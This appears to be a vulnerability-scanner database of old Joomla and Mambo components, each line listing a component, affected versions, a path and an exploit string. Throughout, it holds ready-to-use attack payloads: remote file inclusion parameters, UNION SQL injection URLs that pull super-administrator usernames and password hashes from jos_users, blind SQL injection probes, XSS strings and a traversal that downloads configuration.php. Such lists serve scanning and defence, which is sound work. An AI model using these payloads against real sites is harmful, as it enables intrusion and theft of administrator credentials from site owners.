Component: jReviews RFI Vulnerability Versions Affected: Any |/components/com_jreviews/scripts/xajax.inc.php|/components/com_jreviews/scripts/xajax.inc.php?mosConfig_absolute_path=
Component: BSQ Site Stats 	XSS + SQL Injection Vulnerabilities Versions Affected: 1.8.0 <= |/components/com_bsq_sitestats/|1) Input passed via the "HTTP Referer" Header is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrative user's browser session in context of an affected site when the site statistics are viewed.  2) Input passed via the URI string is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.  Successful exploitation requires that "magic_quotes_gpc" is disabled. 
Component: Madeira RFI Vulnerability  Versions Affected: Any|/components/com_madeira/img.php|/components/com_madeira/img.php?url=
Component: Mambo eMail Publisher    File Inclusion Vulnerability	Versions Affected: 1.2 <= |/components/com_mmp/help.mmp.php|/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
Component: Extended Registration     File Inclusion Vulnerability	Versions Affected: 4.1<= |/components/com_extended_registration/registration_detailed.inc.php|/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=
Component: OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_sef/|N/A
Component: Multibanners  File Inclusion Vulnerability Versions Affected: Any|/components/com_multibanners/extadminmenus.class.php|/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
Component: MoSpray   File Inclusion Vulnerability	Versions Affected: 1.8 RC1 <= |/components/com_mospray/scripts/admin.php|/components/com_mospray/scripts/admin.php?basedir=
Component: MosMedia     File Inclusion Vulnerability    Versions Affected: 1.0.8 <= |/components/com_mosmedia/|/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
Component: Mos Tree   File Inclusion Vulnerability   Versions Affected: 1.58 <= |/components/com_mtree/|/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability  Versions Affected: Any|/components/com_mgm/|/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
Component: MambelFish RFI Vulnerability Versions Affected: 1.x <= |/components/com_mambelfish/|/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
Component: LMO File Inclusion Vulnerability Versions Affected: 1.0b2 <= |/components/com_lmo/|/components/com_lmo/lmo.php?mosConfig_absolute_path=
Component: Link Directory   File Inclusion Vulnerability	  Versions Affected: Any|/components/com_linkdirectory/|/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
Component: Letterman Versions Affected: 1.2.4 <= |/components/mod_letterman/|N/A
Component: JIM  File Inclusion Vulnerability Versions Affected: 1.0.1 <= |/components/com_jim/|/components/com_jim/install.jim.php?mosConfig_absolute_path=
Component: JD-Wiki File Inclusion Vulnerability Versions Affected: Any|/components/com_jd-wiki/|/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=
Component: Joomla Visites      Remote File Inclusion Vulnerability     Versions Affected: 1.1 RC2 <= |/components/com_joomla-visites/|/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=
Component: JPad   SQL Injection Vulnerability  Versions Affected: 1.0<= |/components/com_jpad/|/index.php?option=com_jpad&task=edit&Itemid=39&cid=-1+UNION+ALL+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Filiale Versions  SQL Injection  Vulnerability Affected: 1.0.4 <= |/components/com_filiale/|/index.php?option=com_filiale&idFiliale=-5+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Pony Gallery  SQL Injection Vulnerability	Versions Affected: 1.5 <= |/components/com_ponygallery/|/index.php?option=com_ponygallery&Itemid=x&func=viewcategory&catid=+UNION+SELECT+1,2,3,4,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Joomla Radio 5    File Inclusion Vulnerability 	Versions Affected: 5.0 <= |/components/com_joomlaradiov5/|/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
Component: Flash Slide Show Gallery 	  File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_slideshow/|/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=
Component: zOOm Media Gallery  File Inclusion Vulnerability	Versions Affected: 2.5.1 RC4 <= |/components/com_zoom/classes/|/components/com_zoom/classes/database.php?mosConfig_absolute_path=
Component: VirtueMart (Joomla! E-Commerce)  Multiple XSS Vulnerabilities	Versions Affected: 1.0.11 <= |/components/com_virtuemart/|/index.php?option=com_contact&Itemid=1"><script>alert(1)</script>
Component: User Home Pages 2   File Inclusion Vulnerability  Versions Affected: 1.1.1 <= |/components/com_uhp2/|/components/com_uhp2/uhp_config.php?mosConfig_absolute_path=
Component: User Home Pages 1   File Inclusion Vulnerability 	Versions Affected: 1.1.1 <= |/components/com_uhp/|/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
Component: TaskHopper    File Inclusion Vulnerability    	Versions Affected: 1.1<= |/components/com_thopper/|/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=
Component: Security Images File Inclusion Vulnerability  Versions Affected: 3.0.5 <= |/components/com_securityimages/|/components/com_securityimages/lang.php?mosConfig_absolute_path=
Component: com_utchat File Inclusion Vulnerability Vulnerability Versions Affected: 0.2<= |/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php|/components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php?file=
Component: SimpleBoard  Script Insertion  File Inclusion Vulnerability	Versions Affected: Any|/components/com_simpleboard/|/components/com_simpleboard/file_upload.php?sbp=
Component: SMF Bridge  File Inclusion Vulnerability	Versions Affected: 1.1.4 OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_smf/|/components/com_smf/smf.php?mosConfig_absolute_path=
Component: RWCards   SQL Injection Vulnerability  Versions Affected: 2.4.4 OpenSEF(2.0.0 RC5 Unpatched <=), joomSEF(2.2.1<=), sh404SEF Versions Affected: 1.2.4 w <= |/components/com_rwcards/|/index.php?option=com_rwcards&task=listCards&category_id=-1'UNION+SELECT+1,2,03,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),50,044,076,0678,07+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: RS Gallery2   SQL Injection Vulnerability	Versions Affected: 1.11.3<= |/components/com_rsgallery2/|/index.php?option=com_rsgallery2&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PollXT File Inclusion Vulnerability Versions Affected: 1.22.07<= |/components/com_pollxt/|/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
Component: People Book   File Inclusion Vulnerability	Versions Affected: 1.1.5 <= |/components/com_peoplebook/param.peoplebook.php|/components/com_peoplebook/param.peplebook.php?mosConfig_absolute_path=
Component: Phil-A-Form SQL Injection Vulnerability Versions Affected: 1.2.0.0 <= |/components/com_philaform/|/index.php?option=com_philaform&form_id=-1+UNION+SELECT+null,null,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Per Forms File Inclusion Vulnerability Versions Affected: v1_beta <= |/components/com_performs/|/components/com_performs/performs.php?mosConfig_absolute_path=
Component: Webmaster Tips Portfolio    File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
Component: WmT Advanced Flash Gallery    File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_wmtgallery/|/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
Component: Flash Panoramic View     File Inclusion Vulnerability   Versions Affected: 1.0 <= |/components/com_panoramic/|/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
Component: MamboXChange VideoDB   File Inclusion Vulnerability  Versions Affected: 0.3en <= |/components/com_videodb/core/videodb.class.xml.php|/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
Component: HTMLArea3 addon - ImageManager File Inclusion Vulnerability Versions Affected: 1.5 <= |/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php|/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
Component: Calendar Versions Affected: 1.5.7 <= |/components/com_calendar/|N/A
Component: NFN Address Book Versions Affected: 0.4 <= |/components/com_nfn_addressbook/|N/A
Component: X-Shop RFI Vulnerability Versions Affected: 1.7 <= |/components/com_x-shop/|/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=
Component: Tour de France Pool Versions Affected: 1.0.1 <= |/components/com_tour_toto/|N/A
Component: SWmenu   File Inclusion Vulnerability	 Versions Affected: 4.0 <= |/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
Component: Nice Talk    SQL Injection Vulnerability	 Versions Affected: 0.9.3 <= |/components/com_nicetalk/|/index.php?option=com_nicetalk&tagid=-2)+UNION+SELECT+1,2,3,4,5,6,7,8,0,999,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),777,666,555,444,333,222,111+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: BibTeX Blind SQL Injection Vulnerability Versions Affected: 1.3 <= |/components/com_jombib/|N/A
Component: RSfiles Remote File Download Vulnerability Versions Affected: 1.0.2 <= |/components/com_rsfiles/|/index.php?option=com_rsfiles&task=files.download&path=...index.php
Component: J! Reactions RFI Vulnerability Versions Affected: 1.8.1 <= |/components/com_jreactions/|/components/com_jreactions/langset.php?comPath=
Component: mosListMessenger Versions Affected: 2.1.0 <= |/components/com_lm/|N/A
Component: Webring    File Inclusion Vulnerability    Versions Affected: 1.0<= |/components/com_webring/|/components/com_webring/admin.webring.docs.php?component_dir=
Component: Joomla! 12Pictures     File Inclusion Vulnerability  Versions Affected: 1.0<= |/components/com_joom12pic/|/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Component: FlashFun SQL Injection Vulnerability Versions Affected: 1.0 <= |/components/com_flashfun/|/index.php?option=com_flash&act=view&Itemid=37&id=-13+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: NeoRecruit    SQL Injection Vulnerability	 Versions effected: 1.4.0 and older|/components/com_neorecruit/|/index.php?option=com_neorecruit&task=offer_view&id=option=com_neorecruit&task=offer_view&id=99999999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: MosReporter    File Inclusion Vulnerability	 Versions effected: 0.9.3 and older|/components/com_reporter/processor/reporter.sql.php|/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
Component: Joomla Flash Fun!    File Inclusion Vulnerability	  Versions effected: 1.0 and older|/components/com_joomlaflashfun/|/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Component: mosDirectory   SQL Injection Vulnerability	Versions effected: 2.3.2 and older|/components/com_directory/|/index.php?option=com_directory&page=viewcat&catid=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PU Arcade    SQL Injection Vulnerability	  Versions effected: 2.1.3 Beta and older|/components/com_puarcade/|/index.php?option=com_puarcade&Itemid=92&fid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: RSGallery   SQL Injection Vulnerability	Versions effected: 2.0 beta 5 and older|/components/com_rsgallery/|/index.php?option=com_rsgallery&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: JUser     File Inclusion Vulnerability    Versions effected: 1.0.14 and older|/components/com_juser/|/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
Component: Carousel Flash Image Gallery    File Inclusion Vulnerability    Versions effected: 1.0 and older|/components/com_jjgallery/|/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
Component: Color Lab    File Inclusion Vulnerability   Versions effected: 1.0 and older|/components/com_colorlab/|/components/com_color/admin.color.php?mosConfig_live_site=
Component: Joomla Flash Uploader    File Inclusion Vulnerability   Versions effected: 2.5.2 and older|/components/com_joomla_flash_uploader/|/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
Component: JContentSubscription    File Inclusion Vulnerability   Versions effected: 1.5.8 and older|/components/com_jcs/|/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
Component: Mp3 Allopass   File Inclusion Vulnerability	 Versions effected: 1.0 and older|/components/com_mp3_allopass/|/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
Component: (xsstream-dm) SQL Injection Vulnerability Versions Affected: N/A|/components/com_xsstream-dm/|/index.php?option=com_xsstream-dm&Itemid=69&movie=-1/**/union/**/select/**/1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: (biblestudy) SQL Injection Vulnerability Version Affected: N/A|/components/com_biblestudy/|/index.php?option=com_biblestudy&view=mediaplayer&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component:  com_fq SQL Injection Vulnerability Versions effected: N/A|/components/com_fq/|/index.php?option=com_fq&Itemid=999&listid=999/**/union/**/select/**/0,concat (username,0x3a,password)/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component:  com_football (teamID) SQL Injection Vulnerability Versions effected: N/A|/components/com_football/|/index.php?option=com_football&task=viewteam&teamID=-1+union+select+null,null,3,4,5,6,concat (username,0x3a,password),8+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: jabode SQL injection Vulnerability Version Affected: N/A|/components/com_jabode/|/index.php?option=com_jabode&task=sign&sign=taurus&id=-2+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: netinvoice SQL injection Vulnerability Version Affected: N/A|/components/com_netinvoice/|/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: beamospetition SQL injection Vulnerability variant 1 Version Affected: N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&pet=-5+UNION+SELECT+1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: prayercenter  SQL injection Vulnerability Version Affected: N/A|/components/com_prayercenter/|/index2.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_webhosting  Blind SQL Injection Vulnerability  Version Affected: N/A|/components/com_webhosting/|/index.php?option=com_webhosting&catid=1+and+1=1::/index.php?option=com_webhosting&catid=1+and+1=2
Component: com_datsogallery  Blind SQL Injection Vulnerability  Version Affected: 1.6 or lower|/components/com_datsogallery/|Fill useragent string with 15754'),(1,if(ascii(substring((select password from #__users where username='admin'),0,1))>58,(select 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'),(select link from #__menu)))/*
Component: com_artist  SQL injection Vulnerability Version Affected: N/A|/components/com_artist/|/index.php?option=com_artist&idgalery=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_mycontent Blind SQL Injection Vulnerability Version Affected: N/A|/components/com_mycontent/|/index.php?option=com_mycontent&task=view&id=1+and+1=1::/index.php?option=com_mycontent&task=view&id=1+and+1=2
Component: Joo!BB Blind SQL Injection Vulnerability Version Affected:  0.5.9 or lower|/components/com_joobb/|/index.php?option=com_joobb&view=forum&forum=1+and+1=1::/index.php?option=com_joobb&view=forum&forum=1+and+1=2
Component: acctexp  Blind SQL Injection Vulnerability  Version Affected:  <= 0.12|/components/com_acctexp/|/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=1::/index.php?option=com_acctexp&task=subscribe&usage=1+and+1=2
Component: joomradio SQL Injection Vulnerability Version Affected:  <= 1.0 |/components/com_joomradio/|/index.php?option=com_joomradio&page=show_video&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_equotes  SQL injection  Vulnerability   Version Affected: 0.95 <= |/components/com_equotes/|/index.php?option=com_equotes&id=13+and+1=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_idoblog SQL Injection Vulnerability Version Affected: b24<= |/components/com_idoblog/|/index.php?option=com_idoblog&task=userblog&userid=42+and+1=1+UNION+SELECT+1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: JooBlog Blind SQL Injection  Vulnerability  Version Affected: 0.1.1<= |/components/com_jb2/|/index.php?option=com_jb2&view=category&CategoryID=1+and+1=1::/index.php?option=com_jb2&view=category&CategoryID=1+and+1=2
Component: jotloader Blind SQL Injection Vulnerability  Version Affected: 1.2.1.a<= |/components/com_jotloader/|/index.php?option=com_jotloader&cid=1+and+1=1::/index.php?option=com_jotloader&cid=1+and+1=2
Component: EasyBook SQL Injection Vulnerability Version Affected: 1.1<= |/components/com_easybook/|/index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: joomladate SQL injection   Vulnerability  Version Affected: N/A|/components/com_joomladate/ |/index.php?option=com_joomladate&task=viewProfile&user=9999999+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: GameQ SQL Injection Vulnerability Version Affected: 4.0<= |/components/com_game/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: n-forms Blind SQL Injection Vulnerability Version Affected:  1.01 <= |/components/com_n-forms/|/index.php?option=com_n-forms&form_id=1+and+1=1::/index.php?option=com_n-forms&form_id=1+and+1=2
Component: yvcomment Blind SQL Injection Vulnerability Version Affected:  1.16  <= |/components/com_yvcomment/|/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1=1::/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+1=2
Component: News Portal Blind SQL Injection Vulnerability Version Affected:  1.0  <= |/components/com_news_portal/|/index.php?option=com_news_portal&Itemid=1+and+1=1::/index.php?option=com_news_portal&Itemid=1+and+1=2
Component: expshop SQL injection  Vulnerability  Version Affected: N/A|/components/com_expshop/|/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Xe webtv Blind SQL Injection Vulnerability  Version Affected:  N/A|/components/com_xewebtv/|/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+1=1::/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+1=2
Component: com_versioning (id) SQL Injection Vulnerability     Version Affected:  1.0.2<= |/components/com_versioning /|/index.php?option=com_versioning&task=edit&id=-83+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: mygallery SQL Injection Vulnerability  Version Affected:  N/A|/components/com_mygallery/|/index.php?option=com_mygallery&func=viewcategory&cid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Brightcode Weblinks SQL Injection Vulnerability Version Affected:  N/A|/component/com__brightweblinks/|/index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
Component: QuickTime VR SQL Injection  Vulnerability  Version Affected:  1.0  <= |/components/com_vr/|/index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: is_com  Multiple SQL Injection Vulnerability Version Affected:  1.0.1    <= |/components/com_is/|/index.php?option=com_is&task=motor&motor=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: altas multiple SQL Injection  Vulnerability Version Affected:  1.0    <= |/components/com_altas/|/index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_dbquery RFI Vulnerability Version Affected:  1.4.1.1    <= |/components/com_dbquery/|/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=
Component: ionFiles com_ionfiles  Arbitrary File Download Vulnerability    Version Affected:  4.4.2     <=  |/components/com_ionfiles/|/components/com_ionfiles/download.php?file=../../configuration.php&download=1 
Component: DT SQL Injection Vulnerability  Version Affected:    N/A|/components/com_dtregister/|/index.php?option=com_dtregister&eventId=-12+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72&task=pay_options&Itemid=138
Component: com_ezstore Blind SQL Injection Vulnerability  Version Affected:    N/A|/components/com_ezstore/|/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=1::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+1=2
Component: com_na_qforms (QF_msg) Cross Site Scripting (XSS) Vulnerability   Version Affected: N/A|/components/com_na_qforms/|/index.php?option=com_na_qforms&QF_url=error&QF_msg=%3E%3Cscript%3Ealert(1)%3C/script%3E
Component: Joomla Imagebrowser   Directory Tranversal Vulnerability Version Affected:    0.1.5 RC2<= |/components/remository/|/index.php?option=com_imagebrowser&folder=../../../../_non_
Component: com_hotspots SQL Injection Vulnerability Version Affected:    N/A|/components/com_hotspots/|/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: com_joomtracker SQL Injection Vulnerability  Version Affected:    1.0.1<= |/components/com_joomtracker/|/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* +where+usertype=0x53757065722041646d696e6973747261746f72
Component: Ignite SQL Injection Vulnerability  Version Affected:    0.8.3<= |/components/com_ignitegallery/|/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=18 
Component: Mad4Joomla Mailforms  SQL Injection Vulnerability  Version Affected:  N/A|/components/com_mad4joomla/|/index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Ownbiblio (com_ownbiblio) SQL Injection Vulnerability  Version Affected:  1.5.3<= |/components/com_ownbiblio/|/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: Daily Message (com_dailymessage) SQL Injection Vulnerability  Version Affected:   1.0.3<= |/components/com_dailymessage/|/index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: com_ds-syndicate SQL Injection Vulnerability Version Affected:    N/A|/components/com_ds-syndicate/|Request /index.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- and If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password
Component: com_thyme  SQL Injection Vulnerability Version Affected:    1.0<= |/components/com_thyme/|/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Archaic Binary Gallery Directory Traversal Vulnerability Version Affected: 1.0<= |/components/com_ab_gallery/|/index.php?option=com_ab_gallery&Itemid=37&gallery=_NOT_EXIST
Component: Kbase (com_kbase) SQL Injection Vulnerability Version Affected: 1.2<= |/components/com_kbase/|/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Flash Tree Gallery(com_treeg) Remote File Inclusion Vulnerability Version Affected: 1.0<= |/administrator/components/com_treeg/|/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=
Component: VirtueMart Google Base Component (com_googlebase) Remote File Inclusion Vulnerability Version Affected: 1.1<= |/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=
Component: com_ongumatimesheet20  Beta Remote File Inclusion Vulnerability   Version Affected:   4<= |/components/com_ongumatimesheet20/|/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=
Component: ProDesk  (com_pro_desk) Local File Inclusion Vulnerability    Version Affected:    1.2<= |/components/com_pro_desk/|/index.php?option=com_pro_desk&include_file=
Component: Clickheat - Heatmap stats for Joomla! Multiple Remote File Inclusion Vulnerabilities    Version Affected:    1.0.1<= |/components/com_clickheat/|/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=
Component: Dada Mail Manager Component Remote File Inclusion Vulnerability   Version Affected:   2.6 <= |/components/com_dadamail/|/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]=
Component: Recly!Competitions Component Multiple Remote File Inclusion Vulnerability   Version Affected:   1.0.0  <= |/components/com_competitions/|/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=
